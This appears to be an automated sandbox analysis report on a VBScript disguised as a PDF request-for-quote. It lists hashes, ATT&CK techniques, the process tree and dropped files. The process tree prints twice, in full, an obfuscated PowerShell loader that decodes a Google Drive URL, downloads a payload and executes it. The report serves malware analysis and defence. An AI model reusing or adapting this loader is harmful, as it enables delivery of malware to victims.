03a24fb6fcf36d76df6ed2eb9fbf249b71c0b33bac9a723aa6337ff19bdcebf9

General

Target

RFQ_2414976·pdf.vbs
Size

361KB
MD5

a8bbe905610f17161af68ea8aab57592
SHA1

6a85ada10ba962b10c07955b2f73700842b4932b
SHA256

03a24fb6fcf36d76df6ed2eb9fbf249b71c0b33bac9a723aa6337ff19bdcebf9
SHA512

07a76fd2257c22efb7858573035501ad0e9d55a380e7a213564bfe18eaa4f9f43e8f00a22d50b7d13a1ce9dc30ba1f234e131e03a14a67e91b27918c79059576
SSDEEP

6144:xnILaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP4:h5InOiAZvXAw

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 1964 WScript.exe
10 3912 powershell.exe
14 3912 powershell.exe

flow	pid	process
4	1964	WScript.exe
10	3912	powershell.exe
14	3912	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

10 drive.google.com
8 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5116 4300 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

3912 powershell.exe
3912 powershell.exe
4300 powershell.exe
4300 powershell.exe
4300 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3912 powershell.exe
Token: SeDebugPrivilege 4300 powershell.exe

flow	ioc
10	drive.google.com
8	drive.google.com

pid	pid_target	process	target process
5116	4300	WerFault.exe	powershell.exe

pid	process
3912	powershell.exe
3912	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1964 wrote to memory of 3912	1964	WScript.exe	powershell.exe
PID 1964 wrote to memory of 3912	1964	WScript.exe	powershell.exe
PID 3912 wrote to memory of 4104	3912	powershell.exe	cmd.exe
PID 3912 wrote to memory of 4104	3912	powershell.exe	cmd.exe
PID 3912 wrote to memory of 4300	3912	powershell.exe	powershell.exe
PID 3912 wrote to memory of 4300	3912	powershell.exe	powershell.exe
PID 3912 wrote to memory of 4300	3912	powershell.exe	powershell.exe
PID 4300 wrote to memory of 2248	4300	powershell.exe	cmd.exe
PID 4300 wrote to memory of 2248	4300	powershell.exe	cmd.exe
PID 4300 wrote to memory of 2248	4300	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_2414976·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Underglaze112 = 1;$erstatningsretlig='Substrin';$erstatningsretlig+='g';Function Astenis54($Cahincic){$Hypoed=$Cahincic.Length-$Underglaze112;For($Cuban=7; $Cuban -lt $Hypoed; $Cuban+=(8)){$Grapefrugtsaft+=$Cahincic.$erstatningsretlig.Invoke($Cuban, $Underglaze112);}$Grapefrugtsaft;}function Spsk($Adiadochokinesia){. ($Tetraglottic) ($Adiadochokinesia);}$Ilona=Astenis54 'RvbaldeMNundinaoBrugerszBommesiiPriaca.lKontorsl Skarp.aTelefon/Svanekn5trommer.Nonou,r0scowrat S,ifte(HymnernWGabbliniSvovlblnJuraprodFamili,o LenticwSnydss,sB,spare tan,emiNnonp rmT Metrol Strep.o1 Sy tem0Bloodst.Porta,e0Precept;Morren SomatosWAvianisi MeningnUntrag.6R.sista4 Gantan;Bl,ffma Transamx Spille6Bocc as4 lakevr; Di.tin GennemsrDativervKva,tet:Twitsom1Termitt2Copro,h1N,nprot.Markust0B,milll) Metall Qu,nnaGRevlen,e Afban.cSpninxekBlyanteoDykkerk/ Afs.in2Arveord0 .frens1almohad0Quednes0,utpopo1 Udvlge0Mul ipl1Unpe.ce C bblesFFor,jniiPjattenrlnniveaeCalculifElegiaco UdvalgxRevolut/Nonemph1prosate2Sa.ment1Siskene.Tunnelm0Sponsor ';$Egyptisk=Astenis54 't.legraU AchmetsMar edseRegionprSolistv- informA uturolgCykeltae obliqunBaskeret Fusion ';$Arkaiserende=Astenis54 'UnderclhanthroptF rdelatFuldemapmettinesT avspo:D,gonun/Cata,on/Dum,ingd Si.catrUnderbei ExtendvTraitoreAfstump.TvesindgSkalleroUdviklioUnsuggegPresoaklFarveske Floody. hzbittcAldolasoQuinacrmAfsvaln/BacteriuUnddr.gc.angarb? DeploreFungusyxMatcherpAswailtoDame.rir,nerrabtSprogre=HuskwordRe,visio BakterwSp.erocn.attishl langtuoHaloablaFryde udLetharg&Sengetritekstf,dEustaki= Coo ho1 PrephtGScenaricZeisttr0AfdankeERaadsna6GregoskcVortice6SlutresfLiberti1Indd.ivo KbenhadA serti8GudbarnPLeguminhJulenisk Legha,W S,turijGallashXLysforhFPredispa Propit4Unt.mpe4Sjof,ltwtelete,W GullliDTeahousZ RodskupSyntoniB lrieasKTepoysstdisaffivAbekostbMockery ';$Tabskonto=Astenis54 'Sulphet>Oste.ma ';$Tetraglottic=Astenis54 'AfrenseiUnd,rsteRot,endxUnsatis ';$Rigeliges = Astenis54 'Be,lerbeCorseprcGyvingahForlystoMa.duin Avantga%Incommoa,odhjerpLeviti.p HerrerdBarkedra Amarant DialysaByraads%Droskec\PrancerH Unstr.eHonduralServeridSta.mdrtChurchieByggerer ivaanenPlatteriBrudsiknRe atakg rodukteInv.gilrPeru.abnUnunit e.latitusAnteamb.ArtinesIdemiadunSvinekavt abena Mildnes&S ksebe&Par.ren SynsneeDatalogcPellarjhErnringo Bud ho Posi iv$Sangsva ';Spsk (Astenis54 'P ovins$Lactamig Impas l Sgeko,oPlan.evb SacchaaRecerptlSvuppen: Tske,eUFlipoveg Formant Kalk,lh SlaptveTossuprdUnb,traeDifferenBilledb=Undersk( onformcCrepuscmKonditodUselska Hvidtek/HelplescPhilona Dichlor$AdminisRKa issaigu,stigg Indelee Nonda lB rnersiFungistgQuietlieDormants Drstjd)Ulv tae ');Spsk (Astenis54 'Incurab$udsa,hegFetishilTurbinaoPerronebTeleostaObsessilTu.ercu:Bekla,eUfi lingn llersadQ inqueeFadelesrPie,ruskAtomicilC mplex=ska ele$haplylaAViceborrFarveatkStrobedaOmdigtniTricusssEnsi,age,ineastrHenre,teRetentinMolestedEgenarte,fsvovl.,asedresAfkoblip ,utfitlKorsik.i Scir,htOutcurs(Prjsere$UnbudgeT,ordbunad.sassobDetronisS,enderkFinlandoBedsidenDanmar.tA ktionoConchol)Hypothe ');$Arkaiserende=$Underkl[0];Spsk (Astenis54 'Klvede $dummeregOrganoslEle.ancoInddrivbM,gentaaHjemgivlStumpha:PennileSSprogfok Arbitrrun ppliiB.jlendgIndviklhJoviallaTanderplCognoscsTonjesu= AalbksNQuartereHe,atizw Reconc-DatabasO IntrodbElucidajTophphieIndividc HeidlvtK orami AsbestcSForstrkyen,erocs UnitistSkrmydseAndrasumSca,ter.BlomsteNflorereemarked,tFyldeka.RebreduW Rvesv.eAsiaticboutr ggCEssentilEnte,taiUnrustieDispersnOverru tsmileba ');Spsk (Astenis54 'Ekspekt$UnfirepS,iskettkUlidelir Tabu aiOrchidogMejs.lshUdsavenaPu,dlellCyniatrsBu,ding.MbleresHStaphyle Allit,aSkeformdSkyndteeHeparinrKdensbisRendere[As igma$PolakkeEAkillesg.ahflyty Dieta,pDatakabtWhoosisiLossep s FortrskPyroidb] ,recol=Over it$TennisaICorninglVillab.oCo udicnprimoviaStrutsk ');$Poientere=Astenis54 'I dstniSFyrlamikTrommesrSnit rni Herresgfrdigb.h PerennaSo skinlEquinessBlens,u. TranspDUdpantno PicoliwDomhusenBleep dlFrasef.oBoblepaaNedgr ad,ldritcFInjust,iT,enestlKnacksee Nonste(Pritche$ NdstilAS,raberr BrygpokEfter aaT.ansitiBolighasBowersbeModerstrVedv,reeFireet,n Trien.dSiegli.eLoddern,Kon,ooe$OvernigN Nonfato ExogamcSalumskiExodermclsladele,prgelupForfeittUdadveniPulpingvKoloniseLiguste)Unjudi, ';$Poientere=$Ugtheden[1]+$Poientere;$Nociceptive=$Ugtheden[0];Spsk (Astenis54 ' ecipro$CauterigBengalil ForbruoErhvervbSpurneraMenne.kl Kontr :Snedke.LMajesttoCorn.tovPipistro avestrnorsk sdLuksusj1Kubikin4 Skisky=udelika(DesertfTSmpistoeInfectisBengnavt iskred-Fly,iraPconnexiadekl,ratAl rmtihPiggede Stkkes$PufferiNBlazingohjestercLangfini,mpostecErfarineAftaletpAntipartKrablehiValan.evCoendureSkandin)Ubaa es ');while (!$Lovord14) {Spsk (Astenis54 'Plainta$Deserteg OmstrulCaliphso Flow,rbdanuriraAf yrinlMi,redd:Perine SAlbacorkMyogloba Pla koaFlut.stnBurweedsPhanerol S ksmeeEn.otelnAckeyja=Slikmu,$U,redstt A.sailrSing.eduHjerteke Brydso ') ;Spsk $Poientere;Spsk (Astenis54 ' TallowS NvningtAndelsbaStenzekr .progltafkrfte-Sup,rfoSCosmo,flprivatieAbruptieRidderspFolke,a Respons4 upaa.r ');Spsk (Astenis54 'Taffyli$ TopplagAcidophl ObligaochunterbBrevsa,a F,ushelForhold:Syndig,L SulphooUnaturlv RuineroTeskeesrAfsbenddStadsin1Suppler4Baby it=Formand(Trane.oTUdmejsleMorindos S edtatEfterbe-DegradaP netstjaSmmenestLamprophBaggrun Ins,in$SyntagmNPalstinoPersei.cR ernoniEm,irekcZippereeTil,nnepAlnascht OrientiKapitalvDmmesygeVildspo) Bev.el ') ;Spsk (Astenis54 'Indflyv$Zoo porg Ldrebol For,ano ,idsskbSrstil,aFoulneslSalamie:BenjasaBPiaroaarRai,coaaRo.kildnPadesoynPrinteriK,ldslonBucketeeBlikkensTesse,asAtomrea= Botan $ UngaregGl,msellFeastfuo KulmulbVisseluaMaracanlIkl tes:Dubled,PDeliciorS.arporiAcritolnaffladecRevi ioePrebudgsNonsymbsscattiee Plager2Balkons0Slgtsre2Hemipar+U gange+Kromoso%sub,pte$.limhinUTils annSepuchrdCentrodeIliocosrUnterrek NasrollThermor.Upbri.gc ForulyoKabelfauPostponn UdholdtVkstc.n ') ;$Arkaiserende=$Underkl[$Branniness];}Spsk (Astenis54 'Crucife$A,tichagb nradslGrammatoCafe erbTerminsaRederislmarinat:Ado phuSAntiecca Luf foeKon emntsclerocnAppellai Didactn Rev,brg HandeleWoefullrUhandlenUnalleve Hydrob Formosa=Exactin Ang raiGPartibleCarapidtInvent -AftrdelCIndirecoDamptron Rummaat TariffeEdhathlnTegnehatOpbygge ,wattl$MananasNconf.rmoMedistecCravingi .adavecOctang.eUrusmorpInterortThaietjiPinchinvTars,maeReolplj ');Spsk (Astenis54 'Campbel$b svrligHandw,ilEneboeroIndicatb D.precaRecompolSagn,re:tige,stH KildeaaHummersr RegnawmExpurgafGout esu Elektrlminerallsandblsy Sinist ,eeshs=vundere Augm.nt[P.eenacSCeratinyGenmanisOriginatAnna meeSciama mTilbyde.VareforC,nbraceoEnecatenUdenri,v,pyfauleApostolr Vre setVkst.us] Nazibo:Herbman:LeacherFEvadeblrArgeerso IndkobmSprydstBsej rknaAi.wardsmagtposegjalden6Amphid.4sammenpSFrysnintLoxodror DismemiSubkultnBrandsig ylene(tigersp$LegitimSskriveraPliredee AutokrtUndertinStyrtn,iRutgersnCyclo ogGroins eMathemar Milj,encaigreeeSt mmep)Nontrad ');Spsk (Astenis54 'Interpe$VaginifgMet titlafbeny.oUnwiglrbFallin aUdhuledl Hughsd: AritmeSDumdumboF ctorsu At,rahp BeeveseRebateur Pneo esRevalid Edv rdt=intra a Bedre,s[ UnstatS,otatioyYolkyovsM,lilaltTyvenefeEscapeemBudcent.FljtersTUnderlieh.rtugixChr nostBedamne.HawsingETayramonReservacs.questo SemifedTeoridaiNonoccunGlandulgTriduam]Spadeli:tru.don:AndengrAEp.tafeSGobsmacCStfron IOverstrIIndfrel.DelistiGDimethyeTransmitUnti fiSTollhaltOrganetrKlunkeniLeukorrnSystemugAmfibie(Try,blg$PreemplHG yntera TrkvinrIngathemSkovbruf jalo suSkrukkel sochaslZoileanyTal,owy)T gnerm ');Spsk (Astenis54 'Un,erga$LignescgSladrevlKraftvao Wa erbbP.ncheba Rancefl Y.glin:ExsertiSNeuroselpuffer eCosmogesGenin,kvKneppeniOoziestgS,utninsUnprettk aerdile Aflvni=Multipr$Kall grS gameleokomp ktuMinglinpOkapiere bookstrRaagesbsToetage. VasomosKompa,tuFuskerebDer,atosForretnt AlmemorassentaiPronominhafiztagEpic ut( Lovfor3Cutinsu2 For rf8 Opblom1Fliseeg0Necrolo2Semiret, Mes my2Fdrelan9antho,i6 U,enac1 Flamin7 Trauma)Glasfib ');Spsk $Slesvigske;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Heldterningernes.Inv && echo $"
3⤵
PID:4104

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Underglaze112 = 1;$erstatningsretlig='Substrin';$erstatningsretlig+='g';Function Astenis54($Cahincic){$Hypoed=$Cahincic.Length-$Underglaze112;For($Cuban=7; $Cuban -lt $Hypoed; $Cuban+=(8)){$Grapefrugtsaft+=$Cahincic.$erstatningsretlig.Invoke($Cuban, $Underglaze112);}$Grapefrugtsaft;}function Spsk($Adiadochokinesia){. ($Tetraglottic) ($Adiadochokinesia);}$Ilona=Astenis54 'RvbaldeMNundinaoBrugerszBommesiiPriaca.lKontorsl Skarp.aTelefon/Svanekn5trommer.Nonou,r0scowrat S,ifte(HymnernWGabbliniSvovlblnJuraprodFamili,o LenticwSnydss,sB,spare tan,emiNnonp rmT Metrol Strep.o1 Sy tem0Bloodst.Porta,e0Precept;Morren SomatosWAvianisi MeningnUntrag.6R.sista4 Gantan;Bl,ffma Transamx Spille6Bocc as4 lakevr; Di.tin GennemsrDativervKva,tet:Twitsom1Termitt2Copro,h1N,nprot.Markust0B,milll) Metall Qu,nnaGRevlen,e Afban.cSpninxekBlyanteoDykkerk/ Afs.in2Arveord0 .frens1almohad0Quednes0,utpopo1 Udvlge0Mul ipl1Unpe.ce C bblesFFor,jniiPjattenrlnniveaeCalculifElegiaco UdvalgxRevolut/Nonemph1prosate2Sa.ment1Siskene.Tunnelm0Sponsor ';$Egyptisk=Astenis54 't.legraU AchmetsMar edseRegionprSolistv- informA uturolgCykeltae obliqunBaskeret Fusion ';$Arkaiserende=Astenis54 'UnderclhanthroptF rdelatFuldemapmettinesT avspo:D,gonun/Cata,on/Dum,ingd Si.catrUnderbei ExtendvTraitoreAfstump.TvesindgSkalleroUdviklioUnsuggegPresoaklFarveske Floody. hzbittcAldolasoQuinacrmAfsvaln/BacteriuUnddr.gc.angarb? DeploreFungusyxMatcherpAswailtoDame.rir,nerrabtSprogre=HuskwordRe,visio BakterwSp.erocn.attishl langtuoHaloablaFryde udLetharg&Sengetritekstf,dEustaki= Coo ho1 PrephtGScenaricZeisttr0AfdankeERaadsna6GregoskcVortice6SlutresfLiberti1Indd.ivo KbenhadA serti8GudbarnPLeguminhJulenisk Legha,W S,turijGallashXLysforhFPredispa Propit4Unt.mpe4Sjof,ltwtelete,W GullliDTeahousZ RodskupSyntoniB lrieasKTepoysstdisaffivAbekostbMockery ';$Tabskonto=Astenis54 'Sulphet>Oste.ma ';$Tetraglottic=Astenis54 'AfrenseiUnd,rsteRot,endxUnsatis ';$Rigeliges = Astenis54 'Be,lerbeCorseprcGyvingahForlystoMa.duin Avantga%Incommoa,odhjerpLeviti.p HerrerdBarkedra Amarant DialysaByraads%Droskec\PrancerH Unstr.eHonduralServeridSta.mdrtChurchieByggerer ivaanenPlatteriBrudsiknRe atakg rodukteInv.gilrPeru.abnUnunit e.latitusAnteamb.ArtinesIdemiadunSvinekavt abena Mildnes&S ksebe&Par.ren SynsneeDatalogcPellarjhErnringo Bud ho Posi iv$Sangsva ';Spsk (Astenis54 'P ovins$Lactamig Impas l Sgeko,oPlan.evb SacchaaRecerptlSvuppen: Tske,eUFlipoveg Formant Kalk,lh SlaptveTossuprdUnb,traeDifferenBilledb=Undersk( onformcCrepuscmKonditodUselska Hvidtek/HelplescPhilona Dichlor$AdminisRKa issaigu,stigg Indelee Nonda lB rnersiFungistgQuietlieDormants Drstjd)Ulv tae ');Spsk (Astenis54 'Incurab$udsa,hegFetishilTurbinaoPerronebTeleostaObsessilTu.ercu:Bekla,eUfi lingn llersadQ inqueeFadelesrPie,ruskAtomicilC mplex=ska ele$haplylaAViceborrFarveatkStrobedaOmdigtniTricusssEnsi,age,ineastrHenre,teRetentinMolestedEgenarte,fsvovl.,asedresAfkoblip ,utfitlKorsik.i Scir,htOutcurs(Prjsere$UnbudgeT,ordbunad.sassobDetronisS,enderkFinlandoBedsidenDanmar.tA ktionoConchol)Hypothe ');$Arkaiserende=$Underkl[0];Spsk (Astenis54 'Klvede $dummeregOrganoslEle.ancoInddrivbM,gentaaHjemgivlStumpha:PennileSSprogfok Arbitrrun ppliiB.jlendgIndviklhJoviallaTanderplCognoscsTonjesu= AalbksNQuartereHe,atizw Reconc-DatabasO IntrodbElucidajTophphieIndividc HeidlvtK orami AsbestcSForstrkyen,erocs UnitistSkrmydseAndrasumSca,ter.BlomsteNflorereemarked,tFyldeka.RebreduW Rvesv.eAsiaticboutr ggCEssentilEnte,taiUnrustieDispersnOverru tsmileba ');Spsk (Astenis54 'Ekspekt$UnfirepS,iskettkUlidelir Tabu aiOrchidogMejs.lshUdsavenaPu,dlellCyniatrsBu,ding.MbleresHStaphyle Allit,aSkeformdSkyndteeHeparinrKdensbisRendere[As igma$PolakkeEAkillesg.ahflyty Dieta,pDatakabtWhoosisiLossep s FortrskPyroidb] ,recol=Over it$TennisaICorninglVillab.oCo udicnprimoviaStrutsk ');$Poientere=Astenis54 'I dstniSFyrlamikTrommesrSnit rni Herresgfrdigb.h PerennaSo skinlEquinessBlens,u. TranspDUdpantno PicoliwDomhusenBleep dlFrasef.oBoblepaaNedgr ad,ldritcFInjust,iT,enestlKnacksee Nonste(Pritche$ NdstilAS,raberr BrygpokEfter aaT.ansitiBolighasBowersbeModerstrVedv,reeFireet,n Trien.dSiegli.eLoddern,Kon,ooe$OvernigN Nonfato ExogamcSalumskiExodermclsladele,prgelupForfeittUdadveniPulpingvKoloniseLiguste)Unjudi, ';$Poientere=$Ugtheden[1]+$Poientere;$Nociceptive=$Ugtheden[0];Spsk (Astenis54 ' ecipro$CauterigBengalil ForbruoErhvervbSpurneraMenne.kl Kontr :Snedke.LMajesttoCorn.tovPipistro avestrnorsk sdLuksusj1Kubikin4 Skisky=udelika(DesertfTSmpistoeInfectisBengnavt iskred-Fly,iraPconnexiadekl,ratAl rmtihPiggede Stkkes$PufferiNBlazingohjestercLangfini,mpostecErfarineAftaletpAntipartKrablehiValan.evCoendureSkandin)Ubaa es ');while (!$Lovord14) {Spsk (Astenis54 'Plainta$Deserteg OmstrulCaliphso Flow,rbdanuriraAf yrinlMi,redd:Perine SAlbacorkMyogloba Pla koaFlut.stnBurweedsPhanerol S ksmeeEn.otelnAckeyja=Slikmu,$U,redstt A.sailrSing.eduHjerteke Brydso ') ;Spsk $Poientere;Spsk (Astenis54 ' TallowS NvningtAndelsbaStenzekr .progltafkrfte-Sup,rfoSCosmo,flprivatieAbruptieRidderspFolke,a Respons4 upaa.r ');Spsk (Astenis54 'Taffyli$ TopplagAcidophl ObligaochunterbBrevsa,a F,ushelForhold:Syndig,L SulphooUnaturlv RuineroTeskeesrAfsbenddStadsin1Suppler4Baby it=Formand(Trane.oTUdmejsleMorindos S edtatEfterbe-DegradaP netstjaSmmenestLamprophBaggrun Ins,in$SyntagmNPalstinoPersei.cR ernoniEm,irekcZippereeTil,nnepAlnascht OrientiKapitalvDmmesygeVildspo) Bev.el ') ;Spsk (Astenis54 'Indflyv$Zoo porg Ldrebol For,ano ,idsskbSrstil,aFoulneslSalamie:BenjasaBPiaroaarRai,coaaRo.kildnPadesoynPrinteriK,ldslonBucketeeBlikkensTesse,asAtomrea= Botan $ UngaregGl,msellFeastfuo KulmulbVisseluaMaracanlIkl tes:Dubled,PDeliciorS.arporiAcritolnaffladecRevi ioePrebudgsNonsymbsscattiee Plager2Balkons0Slgtsre2Hemipar+U gange+Kromoso%sub,pte$.limhinUTils annSepuchrdCentrodeIliocosrUnterrek NasrollThermor.Upbri.gc ForulyoKabelfauPostponn UdholdtVkstc.n ') ;$Arkaiserende=$Underkl[$Branniness];}Spsk (Astenis54 'Crucife$A,tichagb nradslGrammatoCafe erbTerminsaRederislmarinat:Ado phuSAntiecca Luf foeKon emntsclerocnAppellai Didactn Rev,brg HandeleWoefullrUhandlenUnalleve Hydrob Formosa=Exactin Ang raiGPartibleCarapidtInvent -AftrdelCIndirecoDamptron Rummaat TariffeEdhathlnTegnehatOpbygge ,wattl$MananasNconf.rmoMedistecCravingi .adavecOctang.eUrusmorpInterortThaietjiPinchinvTars,maeReolplj ');Spsk (Astenis54 'Campbel$b svrligHandw,ilEneboeroIndicatb D.precaRecompolSagn,re:tige,stH KildeaaHummersr RegnawmExpurgafGout esu Elektrlminerallsandblsy Sinist ,eeshs=vundere Augm.nt[P.eenacSCeratinyGenmanisOriginatAnna meeSciama mTilbyde.VareforC,nbraceoEnecatenUdenri,v,pyfauleApostolr Vre setVkst.us] Nazibo:Herbman:LeacherFEvadeblrArgeerso IndkobmSprydstBsej rknaAi.wardsmagtposegjalden6Amphid.4sammenpSFrysnintLoxodror DismemiSubkultnBrandsig ylene(tigersp$LegitimSskriveraPliredee AutokrtUndertinStyrtn,iRutgersnCyclo ogGroins eMathemar Milj,encaigreeeSt mmep)Nontrad ');Spsk (Astenis54 'Interpe$VaginifgMet titlafbeny.oUnwiglrbFallin aUdhuledl Hughsd: AritmeSDumdumboF ctorsu At,rahp BeeveseRebateur Pneo esRevalid Edv rdt=intra a Bedre,s[ UnstatS,otatioyYolkyovsM,lilaltTyvenefeEscapeemBudcent.FljtersTUnderlieh.rtugixChr nostBedamne.HawsingETayramonReservacs.questo SemifedTeoridaiNonoccunGlandulgTriduam]Spadeli:tru.don:AndengrAEp.tafeSGobsmacCStfron IOverstrIIndfrel.DelistiGDimethyeTransmitUnti fiSTollhaltOrganetrKlunkeniLeukorrnSystemugAmfibie(Try,blg$PreemplHG yntera TrkvinrIngathemSkovbruf jalo suSkrukkel sochaslZoileanyTal,owy)T gnerm ');Spsk (Astenis54 'Un,erga$LignescgSladrevlKraftvao Wa erbbP.ncheba Rancefl Y.glin:ExsertiSNeuroselpuffer eCosmogesGenin,kvKneppeniOoziestgS,utninsUnprettk aerdile Aflvni=Multipr$Kall grS gameleokomp ktuMinglinpOkapiere bookstrRaagesbsToetage. VasomosKompa,tuFuskerebDer,atosForretnt AlmemorassentaiPronominhafiztagEpic ut( Lovfor3Cutinsu2 For rf8 Opblom1Fliseeg0Necrolo2Semiret, Mes my2Fdrelan9antho,i6 U,enac1 Flamin7 Trauma)Glasfib ');Spsk $Slesvigske;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Heldterningernes.Inv && echo $"
4⤵
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 2480
4⤵
- Program crash
PID:5116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4300 -ip 4300
1⤵
PID:3508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt

Filesize
7KB

MD5
7cc8cbbe4f7bcdac3063b366764358f7

SHA1
c49b5ecda38fa7fa1fadb9a76b59a501990e2d51

SHA256
6ebee91d79d0b79087ce07fdd6e0f4d32f1ed459b90c48f6cdabb073f84442f5

SHA512
35a660ac7d0d45f9962a70c09952305240e092d720da1b7776a7d6573dafd054816ddfcc76e918b76b6809ff16be7df2ce613f14491898148641deed06cbd58c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt

Filesize
5KB

MD5
895a6e20d6b7d025c88e33b64449ee84

SHA1
916c7d45dfc3a1452f94ff0166ab46f770a3fa60

SHA256
ec2fbbbdaf0dfea50be6fb783217eb55d21cd6ec73f70c6ae6a6a74cfdb125fc

SHA512
f1f1b58c03a522f3394e0bee1927e519ae73201716819102a2c112b41adb4753ba2d1c15abef09961c021d449ac8d5c5ac7428e453e50254c484dcda6b00944a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt

Filesize
1KB

MD5
c7faf0f7af1d769a99763581e1377764

SHA1
a11d9ecdf1d7bd66f222798c2c8bb085645d7b3c

SHA256
6fb460e2ff99c37b12673231049a31e4682650d4589f6483d0efaa048e073b92

SHA512
004e810785d6a6e4b6e3d430834984b67943c0cb4364dc5b0a2f7ce71d71d3d78ad91731d580e7077b76333eb89c139e8d535f41a7802b90e1c42cf4c5019a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5jymuad.xmt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Heldterningernes.Inv

Filesize
465KB

MD5
65fd4e140d9d6909a46aeabf77953435

SHA1
b726d25db15c7dc172c4886766dfd4e53349e400

SHA256
bf9b377292cfe6c0ad35141cbe846bef6bce6de7f4b2d8ca832f9790c6c9d98d

SHA512
8a8eb6e01712dac23f5f7a40cd1538e956646b39b6a79271725ed87ce0c3a3bf04b545842e33137ee6fb0719f7e609fcc4b354611624cb7db599a86afa01eb88

Download Submit
memory/3912-314-0x000001462A120000-0x000001462A142000-memory.dmp

Filesize
136KB

Download
memory/3912-319-0x00007FFD00EF0000-0x00007FFD019B1000-memory.dmp

Filesize
10.8MB

Download
memory/3912-320-0x000001462A240000-0x000001462A250000-memory.dmp

Filesize
64KB

Download
memory/3912-321-0x000001462A240000-0x000001462A250000-memory.dmp

Filesize
64KB

Download
memory/3912-324-0x000001462A240000-0x000001462A250000-memory.dmp

Filesize
64KB

Download
memory/3912-353-0x00007FFD00EF0000-0x00007FFD019B1000-memory.dmp

Filesize
10.8MB

Download
memory/4300-328-0x0000000005260000-0x0000000005888000-memory.dmp

Filesize
6.2MB

Download
memory/4300-343-0x0000000006100000-0x000000000614C000-memory.dmp

Filesize
304KB

Download
memory/4300-329-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/4300-330-0x0000000005890000-0x00000000058F6000-memory.dmp

Filesize
408KB

Download
memory/4300-331-0x0000000005900000-0x0000000005966000-memory.dmp

Filesize
408KB

Download
memory/4300-341-0x00000000059F0000-0x0000000005D44000-memory.dmp

Filesize
3.3MB

Download
memory/4300-342-0x0000000006060000-0x000000000607E000-memory.dmp

Filesize
120KB

Download
memory/4300-327-0x0000000002850000-0x0000000002860000-memory.dmp

Filesize
64KB

Download
memory/4300-344-0x00000000078B0000-0x0000000007F2A000-memory.dmp

Filesize
6.5MB

Download
memory/4300-345-0x0000000006600000-0x000000000661A000-memory.dmp

Filesize
104KB

Download
memory/4300-347-0x00000000072A0000-0x00000000072C2000-memory.dmp

Filesize
136KB

Download
memory/4300-346-0x0000000007310000-0x00000000073A6000-memory.dmp

Filesize
600KB

Download
memory/4300-348-0x00000000084E0000-0x0000000008A84000-memory.dmp

Filesize
5.6MB

Download
memory/4300-326-0x0000000074870000-0x0000000075020000-memory.dmp

Filesize
7.7MB

Download
memory/4300-350-0x0000000074870000-0x0000000075020000-memory.dmp

Filesize
7.7MB

Download
memory/4300-325-0x0000000002770000-0x00000000027A6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing